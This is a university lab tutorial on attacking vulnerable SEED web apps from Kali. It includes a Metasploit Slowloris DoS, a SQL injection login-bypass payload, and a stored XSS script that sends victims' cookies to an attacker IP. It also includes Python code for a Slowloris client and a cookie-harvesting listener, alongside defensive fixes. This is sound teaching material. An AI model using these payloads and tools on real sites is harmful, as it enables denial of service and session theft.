CYS 7132 - Tutorial - 7

This tutorial demonstrates various web application attacks using Kali Linux as the attack machine and the SEED virtual machine as the target. It covers slowloris denial of service attacks, SQL injection, cross-site scripting (XSS), and using the ZAP web application scanner. Students are instructed to configure the SEED VM from a previous tutorial, then launch attacks against vulnerable web applications provided on the SEED VM to gain unauthorized access or extract sensitive information like cookies. Configuring netcat on Kali allows capturing cookies sent by injected client-side JavaScript code to demonstrate XSS attacks.

CYS 7132 Tutorial # 7: Web Attacks

The purpose of this tutorial is to provide hands-on experience with web application
attacks, which have been on the rise lately. Understanding how web attackers operate is
essential in order to design better defenses.
Various web attack vectors will be illustrated. We will use Kali as the attack machine,
and the SEED VM as the target.

The steps to install and configure the SEED VM were provided in Tutorial #1.
The practice will focus on the following attack vectors: the Slowloris DoS web attack,
SQL Injection and Cross-Site Scripting (XSS) in Part 1, and Password Cracking in Part 2.
The SEED VM provides web applications that contain the corresponding
vulnerabilities. The task consists of running the SEED VM and launching the attacks
from Kali.

It is assumed that you’ve configured your SEED machine as suggested in the first
tutorial.

1. SEED VM Configuration
The steps to install and configure the SEED VM were provided in Tutorial #1.
The SEED VM provides web applications that contain different vulnerabilities. The task
will consist of running the SEED VM, and launching the attack from Kali. The
configuration steps for the tutorial are as follows:

Step 1: Get Target VM IP address


The lab sites are reached by hostname (e.g. www.xsslabelgg.com), so the browser running
on Kali must be able to resolve those names to the IP address of the SEED VM. First,
find that address.
In the SEED VM, open a command window (click on the red icon to the left), and get the
IP address using ifconfig:
In my setup, the IP is 192.168.219.101 (yours may be different).

Step 2: Update Hosts file in Kali


In Kali, open the hosts file located under /etc with leafpad, as root (type cd /etc, and
then leafpad hosts). The following will be displayed:

Add the lines shown in the red box: each one maps a lab hostname to the SEED IP found in
Step 1. For this tutorial the browser must at least resolve www.xsslabelgg.com and
www.seedlabsqlinjection.com, so there must be a line of the form "<SEED IP> <hostname>"
for each of them (192.168.219.101 in this setup). Save and close the file.
2. Web DoS Attacks
There are 2 main categories of web DoS attacks:
1. Volumetric attacks, such as HTTP flood attacks, which overload the target
website by submitting a large number of web requests for a sustained period of
time.
2. Slow and low attacks, such as Slowloris, which bring down the target by opening
many connections at once and keeping each one alive with a deliberately
incomplete HTTP request: the headers are sent a few bytes at a time and the blank
line that ends them never arrives. The server holds a worker or connection slot
for every such request, so when its maximum number of concurrent connections is
reached, legitimate requesters are prevented access. Because the traffic volume is
tiny, bandwidth-based defenses do not notice it.
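The mechanism described above, as an added example that is not part of the original tutorial or of the Metasploit module used below. It shows what a Slowloris client actually puts on the wire (a request whose header block is never terminated, topped up with a harmless extra header every few seconds) and the server-side check that such traffic keeps failing. The sockets/delay parameters mirror the Metasploit module's options by assumption, and the default target is the SEED IP from Step 1; run() is only for use against a lab target you own.

```python
"""Slowloris: partial HTTP requests that hold a server slot open indefinitely.

Added example; not code from the tutorial or from Metasploit.
"""
import socket
import time


def initial_request(host: str, path: str = "/") -> bytes:
    """First bytes a Slowloris socket sends: a valid request line and a few
    headers, but WITHOUT the blank line that terminates the header block.
    The server parses what it has, sees no end of headers, and keeps the
    worker (or connection slot) waiting for more."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Accept: */*\r\n"
    ).encode()


def keepalive_header(n: int) -> bytes:
    """A harmless extra header sent every few seconds so the server's
    header/idle timeout never expires.  Still no terminating blank line."""
    return f"X-a: {n}\r\n".encode()


def headers_complete(buf: bytes) -> bool:
    """Server-side view: a request's header block is complete only once the
    empty line (CRLF CRLF) has arrived.  Everything Slowloris sends keeps
    this returning False, so the request is never dispatched or rejected."""
    return b"\r\n\r\n" in buf


def run(host: str, port: int = 80, sockets: int = 150, delay: int = 10) -> None:
    """Open `sockets` partial connections and keep them alive.
    sockets/delay are assumed to correspond to the Metasploit module's
    options of the same name.  Lab use only."""
    conns = []
    for _ in range(sockets):
        s = socket.create_connection((host, port), timeout=4)
        s.send(initial_request(host))
        conns.append(s)
    n = 0
    while conns:
        time.sleep(delay)
        n += 1
        for s in list(conns):
            try:
                s.send(keepalive_header(n))
            except OSError:
                conns.remove(s)  # the server timed this one out; drop it


if __name__ == "__main__":
    import sys
    run(sys.argv[1] if len(sys.argv) > 1 else "192.168.219.101")  # assumed SEED IP
```

The defense follows from headers_complete(): a server must bound how long it waits for the header block to finish (Apache's mod_reqtimeout, for example) rather than waiting for a blank line that an attacker controls.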
You’ll try the Slowloris attack against one of the websites hosted on the SEED machine.
In the SEED machine, open a terminal, type ifconfig, and find out the IP address
connected to the same network as your Kali machine:
In the example above the IP address is 192.168.219.101 (yours may be different). If you
are not sure about the network, do the same in your Kali machine to find out the
corresponding IP:

My Kali VM is connected to the SEED machine through IP 192.168.219.102.

Now, in Kali, open a browser, and go to the site http://www.xsslabelgg.com, as shown
below:
Bookmark the link, and leave the site, e.g. by going to google.com:

Open Metasploit (msfconsole), and search for a slowloris module as shown below:

There is one module: auxiliary/dos/http/slowloris (an auxiliary DoS module, not an
exploit). Select it with use auxiliary/dos/http/slowloris, and then display its
parameters with show options, as shown below:
Keep the default parameters, which indicate that the attack will be against port 80,
where the web server runs. The target IP address is a required parameter: set rhost to
the SEED IP address as follows:

Type run to execute the module as shown above. Wait for a few minutes (4 or 5 or
more):
While the attack is underway, try to access the site again; you'll see that the site is
inaccessible, so the DoS is successful:

Now stop the attack (Ctrl+C, or exit msfconsole) and check again; this time, the site
should load properly:

3. SQL Injection and XSS Attacks

3.1 SQL Injection Attack

The SQL Injection attack will be done against the site
http://www.seedlabsqlinjection.com
Open a browser in Kali and go to the site; the following will be displayed (this
assumes that the SEED VM is also running):

One of the users is Alice. Assume that you don't know her credentials, but would still
like to access her account. Try to log in with alice/1234

As you'll notice, access will be denied because the credentials are wrong.
Now, try the following: use anything for the password (e.g. 123456) and, as the
username: alice' or 'a'='a

You'll see that access will be granted:

This is because the site is vulnerable to SQL injection: the username is pasted into
the SQL query as text, so the single quote closes the string literal and the rest of
the input becomes part of the WHERE clause, which then matches Alice's row regardless
of the password that was typed.
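The login query as it behaves in the lab, next to the parameterized version that is not fooled. This is an added example, not the SEED lab's PHP code: it uses an in-memory SQLite table constructed here (the lab uses MySQL, but the injection works the same way), assumes the lab's WHERE clause has the shape name=... AND password=..., and takes Alice's password seedalice from Section 3.2. It goes one step beyond the tutorial's payload by also showing the ' OR 1=1 -- form, which does not need a valid username.

```python
"""SQL injection on a login SELECT: string concatenation vs. bind parameters.

Added example; not code from the SEED lab.  Table and rows are constructed.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE credential (name TEXT, password TEXT)")
conn.execute(
    "INSERT INTO credential VALUES ('alice', 'seedalice'), ('samy', 'seedsamy')"
)
conn.commit()


def login_vulnerable(name: str, password: str):
    """Concatenates user input straight into SQL (the lab's pattern).
    Returns the matched user name, or None.

    With name = "alice' or 'a'='a" and password = "123456" the query becomes
      ... WHERE name='alice' or 'a'='a' AND password='123456'
    AND binds tighter than OR, so this reads
      name='alice' OR ('a'='a' AND password='123456')
    and Alice's row matches on the first branch; the password is irrelevant.
    With name = "nobody' OR 1=1 -- " the comment removes the password check
    entirely and the first row of the table (Alice) is returned."""
    sql = (
        "SELECT name FROM credential "
        f"WHERE name='{name}' AND password='{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(name: str, password: str):
    """Same query with bind parameters: the driver passes the text as data,
    so the quote, the OR and the comment stay inside the name value and
    simply match no user."""
    sql = "SELECT name FROM credential WHERE name=? AND password=?"
    row = conn.execute(sql, (name, password)).fetchone()
    return row[0] if row else None
```

Hashing the password before the query (as the lab does) changes nothing here: the injection lives in the username field, and the hashed value is still spliced into the same string.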
Find out more about SQL injection by downloading the description of the attack at
http://www.cis.syr.edu/~wedu/seed/Labs_16.04/Web/Web_SQL_Injection/Web_SQL_Injection.pdf
There is also a video at: https://youtu.be/_P8HCLkDInA
Practice:
Perform the following tasks (Section 3, page 3):
1. Read: 3.1-Task 1: Get Familiar with SQL Statements
2. Read: the preamble for 3.2-Task 2: SQL Injection Attack on SELECT Statement

3.2 Cross-Site Scripting (XSS) Attack


The XSS attack will be done against the site http://www.xsslabelgg.com . In Kali, open a
browser, and go to the site:
Log in to the account of Alice using the credentials alice/seedalice

Select More>Members and add a few friends to Alice's profile:


For instance, I’m adding Samy as a friend below:

After adding the friends, click on Account>Settings (top right of the screen):
Click on Edit profile, and add under Brief Description (of Alice's profile) the following
JavaScript code: <script>alert('hacked')</script>
Save the profile by clicking the Save button at the bottom:

Now, logout from the account.


Assume now that you are a new visitor to the site and would like to view Alice's public
profile. By clicking Alice, the following popup will be displayed:

When Alice's profile page is loaded, the JavaScript code embedded in it is executed in
the visitor's browser. That's the essence of a (stored) XSS attack. Now, let's increase
the sophistication by trying to fetch the cookie from the visitor's browser. Log in again
to Alice's account, and add the following code to her profile:
<script>alert(document.cookie);</script>
Click Save.
Log out from the account. Once again, by clicking on Alice's link, the following popup
will be displayed, which contains the cookie:

Cookies matter because the session cookie is what a site uses to recognize a user who
has already logged in, including any second factor (e.g. at a bank) completed during
that login. An attacker who obtains a valid session cookie can therefore act as the
victim without knowing the password at all. In practice, an attacker will not display the
cookie. Instead, he/she will capture it and send it silently to a remote location that
is under their control. We will reproduce this scenario by sending the cookie to the
attack machine (i.e. Kali).
Find out the IP address of your Kali machine on the network shared with the SEED VM. Open
a terminal in Kali, and type ifconfig:
In the above example, the IP address is 192.168.219.102.
Log in to Alice's account and add the following JavaScript code to her profile:
<script>document.write('<img src=http://192.168.219.102:5000?c='
+ escape(document.cookie) + ' >');
</script>
The above JavaScript code sends an HTTP request to the attacker's machine (Kali) on
port 5000 (you can use a different port, e.g. 9000), with the cookies appended to the
request as the c query parameter (escape() percent-encodes them so that '=' and ';'
survive inside the URL). The JavaScript code inserts an <img> tag with its src attribute
set to the attacker's machine. When the JavaScript inserts the img tag, the browser tries
to load the image from the URL in the src field; this results in an HTTP GET request
sent to the attacker's machine. Only cookies readable from JavaScript are included
(cookies flagged HttpOnly are not); as the alert above showed, the Elgg cookie in this
lab is readable.
Make sure to replace the IP address in the code with your Kali IP.
After saving the profile, you will notice a broken image on Alice's profile; this
corresponds to the injected JavaScript code.

Now, logout from Alice’s account.


To receive the cookie on the attacker's machine, we use the netcat program, which is
available in Kali. Netcat is a legitimate program used for various network admin tasks,
but it is also used by attackers to create backdoors and Trojan horses. Open a console in
Kali and type nc -h to list the netcat options:
The "-l" option runs netcat as a server that listens for a connection on the
specified port (e.g. port 5000). This server basically prints out whatever is sent
by the client and sends to the client whatever is typed by the user running the server.
The attack scenario is that the attacker infects the victim by sending a phishing link or
by compromising another site that the victim will visit. Then, to collect the cookie, the
attacker sets up a netcat server that listens for incoming messages sent by the
client-side code used to infect the victim.
To set up the netcat server, type the following command (e.g. nc -lvp 5000, or
nc -lv 5000 depending on the netcat variant installed):

Press return; the server will be waiting.


Next, go to the site as a visitor and click on Alice's profile:
The cookie will be captured and transferred to the netcat server as shown below:

The attacker can now collect the cookie from the request line printed by netcat and use
it to impersonate the victim (e.g. by setting it in their own browser) for as long as the
session remains valid.
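The exfiltration step end to end, as an added example (not code from the tutorial, Elgg or the SEED lab): it builds the injected payload with the attacker address filled in, parses the request the netcat listener prints back into the victim's cookies the way an attacker would, and shows the Elgg-side fix (HTML-escaping the description) that stops the script from running in the first place. The attacker host/port and the sample request in the test are constructed for the example; ExfilHandler is a drop-in replacement for the nc listener that does the parsing itself.

```python
"""XSS cookie exfiltration: payload, listener-side parsing, and the fix.

Added example; not code from the tutorial, Elgg or the SEED lab.
"""
from html import escape as html_escape
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit


def build_payload(attacker_host: str, port: int) -> str:
    """The tutorial's exfiltration script with the attacker address filled in.
    JavaScript's escape() percent-encodes the cookie so '=' and ';' survive
    in the query string (it leaves '+' alone, which matters when parsing)."""
    return (
        "<script>document.write('<img src=http://{}:{}/?c=' "
        "+ escape(document.cookie) + ' >');</script>"
    ).format(attacker_host, port)


def parse_exfil_request(raw: bytes) -> dict:
    """Recover the victim's cookies from the raw HTTP request the listener
    received (the line netcat prints as 'GET /?c=... HTTP/1.1').
    Returns {cookie_name: value}; anything that is not a GET yields {}."""
    request_line = raw.split(b"\r\n", 1)[0].decode("ascii", "replace")
    parts = request_line.split(" ", 2)
    if len(parts) != 3 or parts[0] != "GET":
        return {}
    query = urlsplit(parts[1]).query  # still percent-encoded
    raw_c = ""
    for pair in query.split("&"):
        if pair.startswith("c="):
            raw_c = pair[2:]
    # unquote(), not unquote_plus(): escape() does not encode '+', so a '+'
    # inside a cookie value (e.g. base64) must survive as-is.
    cookie_str = unquote(raw_c)
    cookies = {}
    for pair in cookie_str.split(";"):
        if "=" in pair:
            k, v = pair.strip().split("=", 1)
            cookies[k] = v
    return cookies


def render_description_safe(description: str) -> str:
    """The server-side fix: HTML-encode user content before placing it in
    the page, so '<script>' is displayed as text instead of executed."""
    return "<div class='profile-brief'>" + html_escape(description, quote=True) + "</div>"


class ExfilHandler(BaseHTTPRequestHandler):
    """Does what 'nc -l' does in the tutorial, but parses each hit.  Replies
    with an empty 200 so the victim's browser does not retry the image."""
    captured = []  # (client IP, cookies) for every hit

    def do_GET(self):
        cookies = parse_exfil_request(("GET %s HTTP/1.1\r\n" % self.path).encode())
        ExfilHandler.captured.append((self.client_address[0], cookies))
        print(self.client_address[0], cookies)
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # silence the default access log
        pass


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 5000), ExfilHandler).serve_forever()  # same port as the tutorial
```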
Find out more about XSS attacks by downloading the description of the attack at

https://websitesecuritystore.com/blog/what-is-cross-site-scripting-attack/

There is also a video at:

https://youtu.be/_P8HCLkDInA

Practice:

Perform the following tasks (Section 3, page 3):

1. Read: 3.1 Preparation: Getting Familiar with the "HTTP Header Live" tool

4. Using ZAP
ZAP is a web application scanner, which allows scanning a website to identify
potential vulnerabilities that can further be exploited for attacks such as XSS, SQL
injection, etc.
ZAP is available in Kali and is straightforward to use (if it is missing, see the
Appendix).
To start ZAP, go to Applications>Web Application Analysis>owasp-zap

You can decide to persist (save) the session or not:


Click Start. The ZAP panel will be displayed as follows:
Enter the target site in the text area (URL to attack):
http://www.seedlabsqlinjection.com
Click Attack to start the scan. Scanning takes some time, depending on the
complexity of the site.
At the end of the scan, the results will be displayed in the bottom left panel. You can
note below that 7 alerts have been generated. These correspond to potential
vulnerabilities categorized in different folders: XSS, directory browsing, SQL injection,
etc. By opening the folders, you'll see a list of URLs which point to potentially vulnerable
pages.
For instance, we can see that there is one directory browsing vulnerability which points
to a directory called CSS. Directory browsing (directory listing) means that, when a
directory has no index file, the web server returns a list of its contents; this leaks
file names and versions that help an attacker. It is often confused with, but distinct
from, directory traversal, also called path traversal, which attempts to access files and
directories that are stored outside the web root folder. The web root folder is the
folder that contains the web pages and files that are exposed to the public on a website.
By manipulating variables that reference files with "dot-dot-slash (../)" sequences and
their variations, or by using absolute file paths, it may be possible to access arbitrary
files and directories stored on the file system, including application source code,
configuration files and critical system files.
By entering the URL in the browser, you can see that it points to a directory listing
that in principle is not supposed to be public.
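The traversal check a file-serving handler should apply, as an added example that is not ZAP's code or the lab site's. It resolves a client-supplied path under the web root and rejects anything that lands outside, catching percent-encoded and double-encoded dot-dot sequences and NUL bytes rather than just searching for "..". The web root path is an assumption for the example.

```python
"""Path traversal: confine a client-supplied path to the web root.

Added example; not code from ZAP or the lab site.  WEB_ROOT is assumed.
"""
from pathlib import Path
from urllib.parse import unquote

WEB_ROOT = Path("/var/www/xsslabelgg").resolve()  # assumed document root


def resolve_under_webroot(requested: str, web_root: Path = WEB_ROOT):
    """Map a client-supplied path onto the filesystem, or return None when
    the result would lie outside web_root.

    Decodes percent-encoding twice (so ..%2f and %252e%252e are caught),
    rejects NUL (which truncates the path in C-based servers), strips a
    leading '/' so absolute paths cannot replace the root, and then compares
    the normalised absolute path against the root.  Comparing the resolved
    path is what makes this robust; looking for '..' substrings is not."""
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None
    candidate = (web_root / decoded.lstrip("/")).resolve(strict=False)
    try:
        candidate.relative_to(web_root)
    except ValueError:
        return None  # escaped the web root
    return candidate
```

Directory listing, the alert ZAP actually raised here, is a separate setting: on Apache it is turned off with Options -Indexes for the directory (or by adding an index file).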
5. Other web scanners
A couple of other interesting web scanners are sqlmap and nikto; both are available in
Kali.
Sqlmap
Sqlmap probes a target to gather information that can be used to conduct SQL
injection attacks against it: it automates the process of detecting and exploiting SQL
injection flaws and taking over database servers. It can be used in batch mode
(--batch, which answers every prompt with the default) or interactive mode. The
interactive mode is interesting as it lets you guide the scanner and collect specific
information. Below is a command for the interactive mode, which crawls the site two
levels deep and tests the forms it finds:
sqlmap -u "URL" --forms --crawl=2

For more command options, type sqlmap -h for the help.


Nikto
Nikto is a more general scanner which works like ZAP; it probes the target trying to find
exploitable vulnerabilities. It checks for dangerous files/programs, server configuration
items such as the presence of multiple index files and HTTP server options, and attempts
to identify installed web servers and software. The basic command is:
nikto -h "URL"

For more command options, type nikto -Help for the help.

Summary
This tutorial session introduced web attack methods through two vulnerable web apps
running on the SEED VM. Part 2 will focus on web password cracking using a tool
called Burp Suite.
Appendix: Installing ZAP in Kali
Since Kali 2019.4, ZAP is no longer installed by default.
To install ZAP, in Kali, open a browser and download ZAP:

Download the Linux installer (save it in your Downloads directory):

After completion, you can check the presence of the file in the Downloads directory:
To execute the file, you need to give it execute permission (chmod +x on the installer)
as follows:

Now, install the application as follows:

The following setup windows will popup:

Click Next
Review and accept the license agreement, and click Next:

Select Standard installation and click Next:


Click Install.

Click Finish.
To start ZAP, go to Applications (upper left corner) and search for ZAP:
